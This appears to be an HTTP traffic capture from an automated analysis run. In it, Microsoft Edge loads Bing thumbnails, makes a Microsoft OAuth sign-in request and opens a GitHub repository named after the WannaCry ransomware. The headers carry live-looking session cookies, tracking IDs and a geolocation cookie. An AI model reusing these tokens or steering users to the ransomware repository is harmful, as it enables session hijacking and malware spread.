x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b5129a
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OVP.TmMOyRWQzTpuHVd8Ayz-GwHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OVP.TmMOyRWQzTpuHVd8Ayz-GwHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1771
x-check-cacheable: YES
cache-control: public, max-age=1356521
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51292
GET

https://th.bing.com/th?id=OVP.skUCRr6MbuOZu_nO8StXIAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OVP.skUCRr6MbuOZu_nO8StXIAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9559
cache-control: public, max-age=1209535
date: Thu, 17 Oct 2024 21:04:19 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51298
x-check-cacheable: YES
GET

https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=7df04719-f4e8-42c7-861d-fa4dcca423a3&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22125258D7D1334F6085405077EDD48B89%22%7d

msedge.exe

Remote address:

40.126.32.138:443

Request

GET /common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=7df04719-f4e8-42c7-861d-fa4dcca423a3&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22125258D7D1334F6085405077EDD48B89%22%7d HTTP/2.0
host: login.microsoftonline.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: no-store, no-cache
pragma: no-cache
content-type: text/html; charset=utf-8
content-encoding: gzip
expires: -1
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
x-ms-request-id: 383ce6a3-d478-4471-a194-d93bf3fb4200
x-ms-ests-server: 2.1.19184.6 - NEULR1 ProdSlices
report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
x-ms-srs: 1.P
referrer-policy: strict-origin-when-cross-origin
x-xss-protection: 0
set-cookie: buid=1.ARoAMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAAaAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFexeD5k9YLlkXTH4CfO2lqR4nxwrw1g0RcSGllpOpE9Y-_iM7Tzs6ocrz0sJVhqgbkhNZfsf-mKxXZdMoiqDgU0qhkfbjT3tiqHh1vts2svu4gAA; expires=Sat, 16-Nov-2024 21:03:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: fpc=Ah_KWotNcFFAsgxcg44YbECCeMQLAQAAALJyo94OAAAA; expires=Sat, 16-Nov-2024 21:03:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe-rjbiy0J67sWqIQjqj8jX6M0ZxB7gx3oV2X-vXau5fFOKKKveFYYe0KT3dG2Mqip4m-mSJFRwWvIt1wufVYYdIdXjseLQ6Dem6m7fGhKQHRj3RkJwLfaU2_teU9JAR8fT1Qg9ORy7kLKqyNb04rALtBQ6leRzM7AbDFaVXGZ7SggAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
set-cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
date: Thu, 17 Oct 2024 21:03:46 GMT
content-length: 669
GET

https://github.com/limiteci/WannaCry

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:22 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"e8e17a4241c5c322dfafad464858fa8d"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
set-cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.785614010.1729199062; Path=/; Domain=github.com; Expires=Fri, 17 Oct 2025 21:04:22 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Fri, 17 Oct 2025 21:04:22 GMT; HttpOnly; Secure; SameSite=Lax
accept-ranges: bytes
x-github-request-id: C454:298401:186CD2:1B6E1C:67117BD6
GET

https://github.com/limiteci/WannaCry/sponsor_button

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/sponsor_button HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 204

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:23 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
x-github-request-id: C454:298401:186D59:1B6EB6:67117BD7
GET

https://github.com/limiteci/WannaCry/security/overall-count

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/security/overall-count HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:23 GMT
content-type: text/fragment+html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=14400, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: C454:298401:186D59:1B6EB5:67117BD7
GET

https://github.com/limiteci/WannaCry/hovercards/citation/sidebar_partial?tree_name=main

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/hovercards/citation/sidebar_partial?tree_name=main HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
